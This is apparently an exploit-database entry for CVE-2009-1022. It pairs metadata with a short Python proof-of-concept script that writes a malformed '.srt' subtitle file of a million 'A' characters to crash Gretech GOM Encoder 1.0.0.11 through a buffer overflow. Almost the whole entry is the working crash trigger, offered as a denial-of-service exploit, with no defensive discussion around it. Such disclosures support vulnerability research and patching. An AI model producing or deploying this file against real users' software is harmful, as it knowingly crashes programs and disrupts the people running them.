Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)
Author: Encrypt3d.M!nd type: dos platform: windows port: date_added: 2009-03-15 date_updated: verified: 1 codes: OSVDB-52677;CVE-2009-1022 tags: aliases: screenshot_url: application_url: raw file: 8225.py
#exploit.py # # Gom Encoder (Subtitle File) Buffer Overflow PoC # by :Encrypt3d.M!nd # # Orignal Advisory: # https://www.securityfocus.com/bid/34120 # chars = 'A' * 1000000 file = open ( 'devil_inside.srt', 'w' ) file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars) file.close() # milw0rm.com [2009-03-16]